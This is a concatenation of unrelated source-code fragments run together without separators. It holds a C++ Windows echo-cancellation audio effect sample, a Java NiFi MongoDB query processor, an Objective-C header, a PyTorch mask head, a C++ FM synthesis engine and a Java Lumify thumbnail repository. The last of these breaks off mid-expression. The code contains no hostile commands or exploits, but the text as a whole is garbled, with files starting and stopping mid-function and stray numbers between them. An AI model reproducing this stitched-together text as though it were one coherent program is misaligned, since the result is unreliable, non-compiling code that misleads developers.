if(SUCCEEDED(papoSysFxInit3->pServiceProvider->QueryService(SID_AudioProcessingObjectLoggingService, IID_PPV_ARGS(&m_apoLoggingService)))) { m_apoLoggingService->ApoLog(APO_LOG_LEVEL_INFO, L"CAecApoMFX::Initialize called with APOInitSystemEffects3."); } } else if (cbDataSize == sizeof(APOInitSystemEffects2)) { // // pbyData contains APOInitSystemEffects2 structure describing the microphone endpoint // APOInitSystemEffects2* papoSysFxInit2 = (APOInitSystemEffects2*)pbyData; m_initializedForEffectsDiscovery = papoSysFxInit2->InitializeForDiscoveryOnly; // Support for COMMUNICATIONS mode only when streaming IF_TRUE_ACTION_JUMP( !m_initializedForEffectsDiscovery && (papoSysFxInit2->AudioProcessingMode != AUDIO_SIGNALPROCESSINGMODE_COMMUNICATIONS), hr = E_INVALIDARG, Exit); m_audioSignalProcessingMode = papoSysFxInit2->AudioProcessingMode; m_bIsInitialized = true; } else { hr = E_INVALIDARG; } Exit: return hr; } //------------------------------------------------------------------------- // Description: // // // // Parameters: // // // // Return values: // // // // Remarks: // // STDMETHODIMP CAecApoMFX::GetEffectsList(_Outptr_result_buffer_maybenull_(*pcEffects) LPGUID *ppEffectsIds, _Out_ UINT *pcEffects, _In_ HANDLE Event) { UNREFERENCED_PARAMETER(Event); *ppEffectsIds = NULL; *pcEffects = 0; if (m_audioSignalProcessingMode == AUDIO_SIGNALPROCESSINGMODE_COMMUNICATIONS) { // Return the list of effects implemented by this APO for COMMUNICATIONS processing mode static const GUID effectsList[] = { AUDIO_EFFECT_TYPE_ACOUSTIC_ECHO_CANCELLATION }; *ppEffectsIds = (LPGUID)CoTaskMemAlloc(sizeof(effectsList)); if (!*ppEffectsIds) { return E_OUTOFMEMORY; } *pcEffects = ARRAYSIZE(effectsList); CopyMemory(*ppEffectsIds, effectsList, sizeof(effectsList)); } return S_OK; } HRESULT IsInputFormatSupportedForAec(IAudioMediaType* pMediaType, BOOL * pSupported) { ASSERT_NONREALTIME(); HRESULT hr = S_OK; UNCOMPRESSEDAUDIOFORMAT format; IF_TRUE_ACTION_JUMP((pMediaType == nullptr || pSupported == nullptr), hr = E_INVALIDARG, exit); hr = pMediaType->GetUncompressedAudioFormat(&format); IF_FAILED_JUMP(hr, exit); *pSupported = format.dwBytesPerSampleContainer == 4 && format.dwValidBitsPerSample == 32 && format.fFramesPerSecond == SUPPORTED_AEC_SAMPLINGRATE && // We only support one sampling rate at the input format.dwSamplesPerFrame <= 16 && // We only support <= 16 channels at the input format.guidFormatType == KSDATAFORMAT_SUBTYPE_IEEE_FLOAT; exit: return hr; } HRESULT IsOutputFormatSupportedForAec(IAudioMediaType* pMediaType, BOOL * pSupported) { ASSERT_NONREALTIME(); HRESULT hr = S_OK; UNCOMPRESSEDAUDIOFORMAT format; IF_TRUE_ACTION_JUMP((pMediaType == nullptr || pSupported == nullptr), hr = E_INVALIDARG, exit); hr = pMediaType->GetUncompressedAudioFormat(&format); IF_FAILED_JUMP(hr, exit); *pSupported = format.dwBytesPerSampleContainer == 4 && format.dwValidBitsPerSample == 32 && format.fFramesPerSecond == SUPPORTED_AEC_SAMPLINGRATE && format.dwSamplesPerFrame == 1 && // We only mono output format.guidFormatType == KSDATAFORMAT_SUBTYPE_IEEE_FLOAT; exit: return hr; } HRESULT CreatePreferredInputMediaType(IAudioMediaType** ppMediaType, UINT32 requestedInputChannelCount) { ASSERT_NONREALTIME(); // Default to mono format // We will adjust the channel count based on the requested format later on UNCOMPRESSEDAUDIOFORMAT format = { KSDATAFORMAT_SUBTYPE_IEEE_FLOAT, 1, 4, 32, SUPPORTED_AEC_SAMPLINGRATE, KSAUDIO_SPEAKER_DIRECTOUT }; // Match the channel count of the input if it is less than 16 if (requestedInputChannelCount <= 16) { format.dwSamplesPerFrame = requestedInputChannelCount; format.dwChannelMask = KSAUDIO_SPEAKER_DIRECTOUT; } return CreateAudioMediaTypeFromUncompressedAudioFormat(&format, ppMediaType); } HRESULT CreatePreferredOutputMediaType(IAudioMediaType** ppMediaType) { ASSERT_NONREALTIME(); // Output is mono @ the same sampling rate as the input UNCOMPRESSEDAUDIOFORMAT format = { KSDATAFORMAT_SUBTYPE_IEEE_FLOAT, 1, 4, 32, SUPPORTED_AEC_SAMPLINGRATE, KSAUDIO_SPEAKER_DIRECTOUT }; return CreateAudioMediaTypeFromUncompressedAudioFormat(&format, ppMediaType); } //------------------------------------------------------------------------- // Description: // // // // Parameters: // // // // Return values: // // // // Remarks: // // STDMETHODIMP CAecApoMFX::IsInputFormatSupported(IAudioMediaType *pOutputFormat, IAudioMediaType *pRequestedInputFormat, IAudioMediaType **ppSupportedInputFormat) { ASSERT_NONREALTIME(); HRESULT hResult; IF_TRUE_ACTION_JUMP((NULL == pRequestedInputFormat) || (NULL == ppSupportedInputFormat), hResult = E_POINTER, Exit); *ppSupportedInputFormat = NULL; // This method here is called in the context of the MIC endpoint // There are 2 supported scenarios // - The AEC APO can handle any mic format // - The AEC APO can support exactly 1 input format // // For the purposes of this sample AEC APO, we pretend that the AEC APO supports exactly 1 format // - a sampling rate of SUPPORTED_AEC_SAMPLINGRATE. The APO can accept upto 16 channels at the input // and will output mono audio. // if (pOutputFormat) { // Is this a valid format that we support at the output? BOOL bSupportedOut = FALSE; hResult = IsOutputFormatSupportedForAec(pOutputFormat, &bSupportedOut); IF_FAILED_JUMP(hResult, Exit); if (!bSupportedOut) { return APOERR_FORMAT_NOT_SUPPORTED; } } BOOL bSupported = FALSE; hResult = IsInputFormatSupportedForAec(pRequestedInputFormat, &bSupported); IF_FAILED_JUMP(hResult, Exit); if (!bSupported) { hResult = CreatePreferredInputMediaType(ppSupportedInputFormat, pRequestedInputFormat->GetAudioFormat()->nChannels); IF_FAILED_JUMP(hResult, Exit); return S_FALSE; } pRequestedInputFormat->AddRef(); *ppSupportedInputFormat = pRequestedInputFormat; Exit: return hResult; } //------------------------------------------------------------------------- // Description: // // // // Parameters: // // // // Return values: // // // // Remarks: // // STDMETHODIMP CAecApoMFX::IsOutputFormatSupported(IAudioMediaType *pInputFormat, IAudioMediaType *pRequestedOutputFormat, IAudioMediaType **ppSupportedOutputFormat) { ASSERT_NONREALTIME(); HRESULT hResult; IF_TRUE_ACTION_JUMP((NULL == pRequestedOutputFormat) || (NULL == ppSupportedOutputFormat), hResult = E_POINTER, Exit); *ppSupportedOutputFormat = NULL; if (pInputFormat != nullptr) { BOOL bSupportedIn = FALSE; hResult = IsInputFormatSupportedForAec(pInputFormat, &bSupportedIn); IF_FAILED_JUMP(hResult, Exit); if (!bSupportedIn) { return APOERR_FORMAT_NOT_SUPPORTED; } } BOOL bSupported = FALSE; hResult = IsOutputFormatSupportedForAec(pRequestedOutputFormat, &bSupported); IF_FAILED_JUMP(hResult, Exit); if (!bSupported) { hResult = CreatePreferredOutputMediaType(ppSupportedOutputFormat); IF_FAILED_JUMP(hResult, Exit); return S_FALSE; } pRequestedOutputFormat->AddRef(); *ppSupportedOutputFormat = pRequestedOutputFormat; Exit: return hResult; } STDMETHODIMP CAecApoMFX::AddAuxiliaryInput( DWORD dwInputId, UINT32 cbDataSize, BYTE *pbyData, APO_CONNECTION_DESCRIPTOR * pInputConnection ) { HRESULT hResult = S_OK; CComPtr<IAudioMediaType> spSupportedType; ASSERT_NONREALTIME(); IF_TRUE_ACTION_JUMP(m_bIsLocked, hResult = APOERR_APO_LOCKED, Exit); IF_TRUE_ACTION_JUMP(!m_bIsInitialized, hResult = APOERR_NOT_INITIALIZED, Exit); BOOL bSupported = FALSE; hResult = IsInputFormatSupportedForAec(pInputConnection->pFormat, &bSupported); IF_FAILED_JUMP(hResult, Exit); IF_TRUE_ACTION_JUMP(!bSupported, hResult = APOERR_FORMAT_NOT_SUPPORTED, Exit); // This APO can only handle 1 auxiliary input IF_TRUE_ACTION_JUMP(m_auxiliaryInputId != 0, hResult = APOERR_NUM_CONNECTIONS_INVALID, Exit); m_auxiliaryInputId = dwInputId; IF_TRUE_ACTION_JUMP( ((NULL == pbyData) && (0 != cbDataSize)), hResult = E_INVALIDARG, Exit); IF_TRUE_ACTION_JUMP( ((NULL != pbyData) && (0 == cbDataSize)), hResult = E_INVALIDARG, Exit); if (cbDataSize == sizeof(APOInitSystemEffects3)) { /* // // pbyData contains APOInitSystemEffects3 structure describing the loopback endpoint // APOInitSystemEffects3* papoSysFxInit3 = (APOInitSystemEffects3*)pbyData; // Register for notification in GetApoNotificationRegistrationInfo // Keep a reference to the loopback device that will be registering for endpoint volume notifcations. IF_TRUE_ACTION_JUMP(papoSysFxInit3->pDeviceCollection == nullptr, hResult = E_INVALIDARG, Exit); UINT32 numDevices; hResult = papoSysFxInit3->pDeviceCollection->GetCount(&numDevices); IF_FAILED_JUMP(hResult, Exit); IF_TRUE_ACTION_JUMP(numDevices <= 0, hResult = E_INVALIDARG, Exit); hResult = papoSysFxInit3->pDeviceCollection->Item(numDevices - 1, &m_spLoopbackDevice); IF_FAILED_JUMP(hResult, Exit); */ } else { // // pbyData contains APOInitSystemEffects2 structure describing the render endpoint // } // Signal to AEC algorithm that there is a reference audio stream Exit: return hResult; } STDMETHODIMP CAecApoMFX::RemoveAuxiliaryInput(DWORD dwInputId) { HRESULT hResult = S_OK; ASSERT_NONREALTIME(); IF_TRUE_ACTION_JUMP(m_bIsLocked, hResult = APOERR_APO_LOCKED, Exit); IF_TRUE_ACTION_JUMP(!m_bIsInitialized, hResult = APOERR_NOT_INITIALIZED, Exit); // This APO can only handle 1 auxiliary input IF_TRUE_ACTION_JUMP(m_auxiliaryInputId != dwInputId, hResult = APOERR_INVALID_INPUTID, Exit); m_auxiliaryInputId = 0; // Signal to AEC algorithm that there is no longer any reference audio stream Exit: return hResult; } STDMETHODIMP CAecApoMFX::IsInputFormatSupported(IAudioMediaType* pRequestedInputFormat, IAudioMediaType** ppSupportedInputFormat) { ASSERT_NONREALTIME(); HRESULT hResult = S_OK; IF_TRUE_ACTION_JUMP((NULL == pRequestedInputFormat) || (NULL == ppSupportedInputFormat), hResult = E_POINTER, Exit); BOOL bSupported = FALSE; hResult = IsInputFormatSupportedForAec(pRequestedInputFormat, &bSupported); IF_FAILED_JUMP(hResult, Exit); if (!bSupported) { hResult = CreatePreferredInputMediaType(ppSupportedInputFormat, pRequestedInputFormat->GetAudioFormat()->nChannels); IF_FAILED_JUMP(hResult, Exit); return S_FALSE; } pRequestedInputFormat->AddRef(); *ppSupportedInputFormat = pRequestedInputFormat; Exit: return hResult; } // IAPOAuxiliaryInputRT STDMETHODIMP_(void) CAecApoMFX::AcceptInput(DWORD dwInputId, const APO_CONNECTION_PROPERTY * pInputConnection) { ASSERT_REALTIME(); ATLASSERT(m_bIsInitialized); ATLASSERT(m_bIsLocked); ATLASSERT(pInputConnection->u32Signature == APO_CONNECTION_PROPERTY_V2_SIGNATURE); ATLASSERT(inputId == m_auxiliaryInputId); UNREFERENCED_PARAMETER(dwInputId); const APO_CONNECTION_PROPERTY_V2* connectionV2 = reinterpret_cast<const APO_CONNECTION_PROPERTY_V2*>(pInputConnection); // Check connectionV2->property.u32BufferFlags to see whether loopback buffer is silent // Provide loopback buffer and timestamp to AEC algorithm UNREFERENCED_PARAMETER(connectionV2); } STDMETHODIMP CAecApoMFX::GetApoNotificationRegistrationInfo(_Out_writes_(*count) APO_NOTIFICATION_DESCRIPTOR** apoNotifications, _Out_ DWORD* count) { *apoNotifications = nullptr; *count = 0; /* RETURN_HR_IF_NULL(E_FAIL, m_spCaptureDevice); RETURN_HR_IF_NULL(E_FAIL, m_spLoopbackDevice); // Let the OS know what notifications we are interested in by returning an array of // APO_NOTIFICATION_DESCRIPTORs. constexpr DWORD numDescriptors = 2; wil::unique_cotaskmem_ptr<APO_NOTIFICATION_DESCRIPTOR[]> apoNotificationDescriptors; apoNotificationDescriptors.reset( static_cast<APO_NOTIFICATION_DESCRIPTOR*>(CoTaskMemAlloc(sizeof(APO_NOTIFICATION_DESCRIPTOR) * numDescriptors))); RETURN_IF_NULL_ALLOC(apoNotificationDescriptors); // Our APO wants to get notified when a endpoint volume changes on the capture endpoint. apoNotificationDescriptors[0].type = APO_NOTIFICATION_TYPE_ENDPOINT_VOLUME; (void)m_spCaptureDevice->QueryInterface(&apoNotificationDescriptors[0].audioEndpointVolume.device); // Our APO wants to get notified when a endpoint volume changes on the auxiliary input endpoint. apoNotificationDescriptors[1].type = APO_NOTIFICATION_TYPE_ENDPOINT_VOLUME; (void)m_spLoopbackDevice->QueryInterface(&apoNotificationDescriptors[1].audioEndpointVolume.device); *apoNotifications = apoNotificationDescriptors.release(); *count = numDescriptors; */ return S_OK; } static bool IsSameEndpointId(IMMDevice* device1, IMMDevice* device2) { bool isSameEndpointId = false; wil::unique_cotaskmem_string deviceId1; if (SUCCEEDED(device1->GetId(&deviceId1))) { wil::unique_cotaskmem_string deviceId2; if (SUCCEEDED(device2->GetId(&deviceId2))) { isSameEndpointId = (CompareStringOrdinal(deviceId1.get(), -1, deviceId2.get(), -1, TRUE) == CSTR_EQUAL); } } return isSameEndpointId; } // HandleNotification is called whenever there is a change that matches any of the // APO_NOTIFICATION_DESCRIPTOR elements in the array that was returned by GetApoNotificationRegistrationInfo. // Note that the APO will have to query each property once to get its initial value because this method is // only invoked when any of the properties have changed. STDMETHODIMP_(void) CAecApoMFX::HandleNotification(_In_ APO_NOTIFICATION* /* apoNotification */) { // Handle endpoint volume change /* if (apoNotification->type == APO_NOTIFICATION_TYPE_ENDPOINT_PROPERTY_CHANGE) { if (IsSameEndpointId(apoNotification->audioEndpointVolumeChange.endpoint, m_spCaptureDevice)) { m_captureEndpointMasterVolume = apoNotification->audioEndpointVolumeChange.volume->fMasterVolume; } else if (IsSameEndpointId(apoNotification->audioEndpointVolumeChange.endpoint, m_spLoopbackDevice)) { m_loopbackEndpointMasterVolume = apoNotification->audioEndpointVolumeChange.volume->fMasterVolume; } } else if (apoNotification->type == APO_NOTIFICATION_TYPE_ENDPOINT_PROPERTY_CHANGE) { } else if(apoNotification->type == APO_NOTIFICATION_TYPE_SYSTEM_EFFECTS_PROPERTY_CHANGE) { } */ }
11,649
3,212
<filename>nifi-nar-bundles/nifi-mongodb-bundle/nifi-mongodb-processors/src/main/java/org/apache/nifi/processors/mongodb/AbstractMongoQueryProcessor.java /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.nifi.processors.mongodb; import com.mongodb.client.MongoCollection; import org.apache.nifi.components.PropertyDescriptor; import org.apache.nifi.expression.ExpressionLanguageScope; import org.apache.nifi.flowfile.FlowFile; import org.apache.nifi.flowfile.attributes.CoreAttributes; import org.apache.nifi.processor.ProcessContext; import org.apache.nifi.processor.ProcessSession; import org.apache.nifi.processor.Relationship; import org.apache.nifi.processor.exception.ProcessException; import org.apache.nifi.processor.util.JsonValidator; import org.apache.nifi.processor.util.StandardValidators; import org.bson.Document; import java.io.ByteArrayOutputStream; import java.util.HashMap; import java.util.Map; public abstract class AbstractMongoQueryProcessor extends AbstractMongoProcessor { public static final String DB_NAME = "mongo.database.name"; public static final String COL_NAME = "mongo.collection.name"; public static final Relationship REL_SUCCESS = new Relationship.Builder() .name("success") .description("All FlowFiles that have the results of a successful query execution go here.") .build(); public static final Relationship REL_FAILURE = new Relationship.Builder() .name("failure") .description("All input FlowFiles that are part of a failed query execution go here.") .build(); public static final Relationship REL_ORIGINAL = new Relationship.Builder() .name("original") .description("All input FlowFiles that are part of a successful query execution go here.") .build(); public static final PropertyDescriptor QUERY = new PropertyDescriptor.Builder() .name("Query") .description("The selection criteria to do the lookup. If the field is left blank, it will look for input from" + " an incoming connection from another processor to provide the query as a valid JSON document inside of " + "the FlowFile's body. If this field is left blank and a timer is enabled instead of an incoming connection, " + "that will result in a full collection fetch using a \"{}\" query.") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(JsonValidator.INSTANCE) .build(); public static final PropertyDescriptor PROJECTION = new PropertyDescriptor.Builder() .name("Projection") .description("The fields to be returned from the documents in the result set; must be a valid BSON document") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(JsonValidator.INSTANCE) .build(); public static final PropertyDescriptor SORT = new PropertyDescriptor.Builder() .name("Sort") .description("The fields by which to sort; must be a valid BSON document") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(JsonValidator.INSTANCE) .build(); public static final PropertyDescriptor LIMIT = new PropertyDescriptor.Builder() .name("Limit") .description("The maximum number of elements to return") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(StandardValidators.POSITIVE_INTEGER_VALIDATOR) .build(); public static final PropertyDescriptor BATCH_SIZE = new PropertyDescriptor.Builder() .name("Batch Size") .description("The number of elements to be returned from the server in one batch") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(StandardValidators.POSITIVE_INTEGER_VALIDATOR) .build(); static final PropertyDescriptor RESULTS_PER_FLOWFILE = new PropertyDescriptor.Builder() .name("results-per-flowfile") .displayName("Results Per FlowFile") .description("How many results to put into a FlowFile at once. The whole body will be treated as a JSON array of results.") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(StandardValidators.POSITIVE_INTEGER_VALIDATOR) .build(); protected Document getQuery(ProcessContext context, ProcessSession session, FlowFile input) { Document query = null; if (context.getProperty(QUERY).isSet()) { query = Document.parse(context.getProperty(QUERY).evaluateAttributeExpressions(input).getValue()); } else if (!context.getProperty(QUERY).isSet() && input == null) { query = Document.parse("{}"); } else { try { ByteArrayOutputStream out = new ByteArrayOutputStream(); session.exportTo(input, out); out.close(); query = Document.parse(new String(out.toByteArray())); } catch (Exception ex) { getLogger().error("Error reading FlowFile : ", ex); throw new ProcessException(ex); } } return query; } protected Map<String, String> getAttributes(ProcessContext context, FlowFile input, Document query, MongoCollection collection) { final Map<String, String> attributes = new HashMap<>(); attributes.put(CoreAttributes.MIME_TYPE.key(), "application/json"); if (context.getProperty(QUERY_ATTRIBUTE).isSet()) { final String queryAttr = context.getProperty(QUERY_ATTRIBUTE).evaluateAttributeExpressions(input).getValue(); attributes.put(queryAttr, query.toJson()); } attributes.put(DB_NAME, collection.getNamespace().getDatabaseName()); attributes.put(COL_NAME, collection.getNamespace().getCollectionName()); return attributes; } }
2,573
491
<gh_stars>100-1000 // // ASMediaFocusBasicToolbarController.h // ASMediaFocusExemple // // Created by <NAME> on 05/02/2016. // Copyright © 2016 AutreSphere. All rights reserved. // #import <UIKit/UIKit.h> @interface ASMediaFocusBasicToolbarController : UIViewController @property (strong, nonatomic) IBOutlet UIButton *doneButton; @end
117
521
<gh_stars>100-1000 # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. import torch from torch import nn from mega_core.structures.bounding_box import BoxList from .roi_mask_feature_extractors import make_roi_mask_feature_extractor from .roi_mask_predictors import make_roi_mask_predictor from .inference import make_roi_mask_post_processor from .loss import make_roi_mask_loss_evaluator def keep_only_positive_boxes(boxes): """ Given a set of BoxList containing the `labels` field, return a set of BoxList for which `labels > 0`. Arguments: boxes (list of BoxList) """ assert isinstance(boxes, (list, tuple)) assert isinstance(boxes[0], BoxList) assert boxes[0].has_field("labels") positive_boxes = [] positive_inds = [] num_boxes = 0 for boxes_per_image in boxes: labels = boxes_per_image.get_field("labels") inds_mask = labels > 0 inds = inds_mask.nonzero().squeeze(1) positive_boxes.append(boxes_per_image[inds]) positive_inds.append(inds_mask) return positive_boxes, positive_inds class ROIMaskHead(torch.nn.Module): def __init__(self, cfg, in_channels): super(ROIMaskHead, self).__init__() self.cfg = cfg.clone() self.feature_extractor = make_roi_mask_feature_extractor(cfg, in_channels) self.predictor = make_roi_mask_predictor( cfg, self.feature_extractor.out_channels) self.post_processor = make_roi_mask_post_processor(cfg) self.loss_evaluator = make_roi_mask_loss_evaluator(cfg) def forward(self, features, proposals, targets=None): """ Arguments: features (list[Tensor]): feature-maps from possibly several levels proposals (list[BoxList]): proposal boxes targets (list[BoxList], optional): the ground-truth targets. Returns: x (Tensor): the result of the feature extractor proposals (list[BoxList]): during training, the original proposals are returned. During testing, the predicted boxlists are returned with the `mask` field set losses (dict[Tensor]): During training, returns the losses for the head. During testing, returns an empty dict. """ if self.training: # during training, only focus on positive boxes all_proposals = proposals proposals, positive_inds = keep_only_positive_boxes(proposals) if self.training and self.cfg.MODEL.ROI_MASK_HEAD.SHARE_BOX_FEATURE_EXTRACTOR: x = features x = x[torch.cat(positive_inds, dim=0)] else: x = self.feature_extractor(features, proposals) mask_logits = self.predictor(x) if not self.training: result = self.post_processor(mask_logits, proposals) return x, result, {} loss_mask = self.loss_evaluator(proposals, mask_logits, targets) return x, all_proposals, dict(loss_mask=loss_mask) def build_roi_mask_head(cfg, in_channels): return ROIMaskHead(cfg, in_channels)
1,303
1,802
// Copyright 2016 <NAME>. // // Author: <NAME> (<EMAIL>) // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. // // See http://creativecommons.org/licenses/MIT/ for more information. // // ----------------------------------------------------------------------------- // // Classic 2-op FM found in Braids, Rings and Elements. #include "plaits/dsp/engine/fm_engine.h" #include "stmlib/dsp/parameter_interpolator.h" #include "plaits/resources.h" namespace plaits { using namespace stmlib; void FMEngine::Init(BufferAllocator* allocator) { carrier_phase_ = 0; modulator_phase_ = 0; sub_phase_ = 0; previous_carrier_frequency_ = a0; previous_modulator_frequency_ = a0; previous_amount_ = 0.0f; previous_feedback_ = 0.0f; previous_sample_ = 0.0f; } void FMEngine::Reset() { } inline float FMEngine::SinePM(uint32_t phase, float fm) const { phase += (static_cast<uint32_t>((fm + 4.0f) * 536870912.0f)) << 3; uint32_t integral = phase >> 22; float fractional = static_cast<float>(phase << 10) / 4294967296.0f; float a = lut_sine[integral]; float b = lut_sine[integral + 1]; return a + (b - a) * fractional; } const size_t kOversampling = 4; const size_t kFirHalfSize = 4; static const float fir_coefficient[kFirHalfSize] = { 0.02442415f, 0.09297315f, 0.16712938f, 0.21547332f, }; class Downsampler { public: Downsampler(float* state) { head_ = *state; tail_ = 0.0f; state_ = state; } ~Downsampler() { *state_ = head_; } inline void Accumulate(int i, float sample) { head_ += sample * fir_coefficient[3 - (i & 3)]; tail_ += sample * fir_coefficient[i & 3]; } inline float Read() { float value = head_; head_ = tail_; tail_ = 0.0f; return value; } private: float head_; float tail_; float* state_; DISALLOW_COPY_AND_ASSIGN(Downsampler); }; void FMEngine::Render( const EngineParameters& parameters, float* out, float* aux, size_t size, bool* already_enveloped) { // 4x oversampling const float note = parameters.note - 24.0f; const float ratio = Interpolate( lut_fm_frequency_quantizer, parameters.harmonics, 128.0f); float modulator_note = note + ratio; float target_modulator_frequency = NoteToFrequency(modulator_note); CONSTRAIN(target_modulator_frequency, 0.0f, 0.5f); // Reduce the maximum FM index for high pitched notes, to prevent aliasing. float hf_taming = 1.0f - (modulator_note - 72.0f) * 0.025f; CONSTRAIN(hf_taming, 0.0f, 1.0f); hf_taming *= hf_taming; ParameterInterpolator carrier_frequency( &previous_carrier_frequency_, NoteToFrequency(note), size); ParameterInterpolator modulator_frequency( &previous_modulator_frequency_, target_modulator_frequency, size); ParameterInterpolator amount_modulation( &previous_amount_, 2.0f * parameters.timbre * parameters.timbre * hf_taming, size); ParameterInterpolator feedback_modulation( &previous_feedback_, 2.0f * parameters.morph - 1.0f, size); Downsampler carrier_downsampler(&carrier_fir_); Downsampler sub_downsampler(&sub_fir_); while (size--) { const float amount = amount_modulation.Next(); const float feedback = feedback_modulation.Next(); float phase_feedback = feedback < 0.0f ? 0.5f * feedback * feedback : 0.0f; const uint32_t carrier_increment = static_cast<uint32_t>( 4294967296.0f * carrier_frequency.Next()); float _modulator_frequency = modulator_frequency.Next(); for (size_t j = 0; j < kOversampling; ++j) { modulator_phase_ += static_cast<uint32_t>(4294967296.0f * \ _modulator_frequency * (1.0f + previous_sample_ * phase_feedback)); carrier_phase_ += carrier_increment; sub_phase_ += carrier_increment >> 1; float modulator_fb = feedback > 0.0f ? 0.25f * feedback * feedback : 0.0f; float modulator = SinePM( modulator_phase_, modulator_fb * previous_sample_); float carrier = SinePM(carrier_phase_, amount * modulator); float sub = SinePM(sub_phase_, amount * carrier * 0.25f); ONE_POLE(previous_sample_, carrier, 0.05f); carrier_downsampler.Accumulate(j, carrier); sub_downsampler.Accumulate(j, sub); } *out++ = carrier_downsampler.Read(); *aux++ = sub_downsampler.Read(); } } } // namespace plaits
1,984
1,338
<filename>src/apps/launchbox/NamePanel.h /* * Copyright 2006-2011, <NAME> <<EMAIL>>. * All rights reserved. Distributed under the terms of the MIT License. */ #ifndef NAME_PANEL_H #define NAME_PANEL_H #include "Panel.h" class BTextControl; class NamePanel : public Panel { public: NamePanel(const char* label, const char* text, BWindow* window, BHandler* target, BMessage* message, const BSize& size); virtual ~NamePanel(); virtual void MessageReceived(BMessage *message); private: BTextControl* fNameTC; BWindow* fWindow; BHandler* fTarget; BMessage* fMessage; window_feel fSavedTargetWindowFeel; }; #endif // NAME_PANEL_H
271
375
<filename>core/core/src/main/java/io/lumify/core/model/artifactThumbnails/ArtifactThumbnailRepository.java package io.lumify.core.model.artifactThumbnails; import com.altamiracorp.bigtable.model.ModelSession; import com.altamiracorp.bigtable.model.Repository; import com.altamiracorp.bigtable.model.Row; import io.lumify.core.exception.LumifyResourceNotFoundException; import io.lumify.core.model.ontology.OntologyRepository; import io.lumify.core.model.properties.types.BooleanLumifyProperty; import io.lumify.core.model.properties.types.IntegerLumifyProperty; import io.lumify.core.user.User; import io.lumify.core.util.LumifyLogger; import io.lumify.core.util.LumifyLoggerFactory; import org.securegraph.Vertex; import javax.imageio.ImageIO; import java.awt.*; import java.awt.image.BufferedImage; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStream; import static com.google.common.base.Preconditions.checkNotNull; public abstract class ArtifactThumbnailRepository extends Repository<BigTableArtifactThumbnail> { private static final LumifyLogger LOGGER = LumifyLoggerFactory.getLogger(ArtifactThumbnailRepository.class); public static int FRAMES_PER_PREVIEW = 20; public static int PREVIEW_FRAME_WIDTH = 360; public static int PREVIEW_FRAME_HEIGHT = 240; private BooleanLumifyProperty yAxisFlippedProperty; private IntegerLumifyProperty clockwiseRotationProperty; public ArtifactThumbnailRepository(ModelSession modelSession, final OntologyRepository ontologyRepository) { super(modelSession); String yAxisFlippedPropertyIri = ontologyRepository.getPropertyIRIByIntent("media.yAxisFlipped"); if (yAxisFlippedPropertyIri != null) { this.yAxisFlippedProperty = new BooleanLumifyProperty(yAxisFlippedPropertyIri); } String clockwiseRotationPropertyIri = ontologyRepository.getPropertyIRIByIntent("media.clockwiseRotation"); if (clockwiseRotationPropertyIri != null) { this.clockwiseRotationProperty = new IntegerLumifyProperty(clockwiseRotationPropertyIri); } } public abstract BigTableArtifactThumbnail fromRow(Row row); public abstract Row toRow(BigTableArtifactThumbnail artifactThumbnail); public abstract String getTableName(); public abstract ArtifactThumbnail getThumbnail(Object artifactVertexId, String thumbnailType, int width, int height, User user); public abstract byte[] getThumbnailData(Object artifactVertexId, String thumbnailType, int width, int height, User user); public abstract ArtifactThumbnail createThumbnail(Vertex artifactVertex, String thumbnailType, InputStream in, int[] boundaryDims, User user) throws IOException; public ArtifactThumbnail generateThumbnail(Vertex artifactVertex, InputStream in, int[] boundaryDims) { ByteArrayOutputStream out = new ByteArrayOutputStream(); String format; int type; try { BufferedImage originalImage = ImageIO.read(in); checkNotNull(originalImage, "Could not generateThumbnail: read original image for artifact " + artifactVertex.getId()); type = ImageUtils.thumbnailType(originalImage); format = ImageUtils.thumbnailFormat(originalImage); BufferedImage transformedImage = getTransformedImage(originalImage, artifactVertex); //Get new image dimensions, which will be used for the icon. int[] transformedImageDims = new int[]{transformedImage.getWidth(), transformedImage.getHeight()}; int[] newImageDims = getScaledDimension(transformedImageDims, boundaryDims); if (newImageDims[0] >= transformedImageDims[0] || newImageDims[1] >= transformedImageDims[1]) { LOGGER.info("Original image dimensions %d x %d are smaller " + "than requested dimensions %d x %d returning original.", transformedImageDims[0], transformedImageDims[1], newImageDims[0], newImageDims[1]); } //Resize the image. BufferedImage resizedImage = new BufferedImage(newImageDims[0], newImageDims[1], type); Graphics2D g = resizedImage.createGraphics(); if (transformedImage.getColorModel().getNumComponents() > 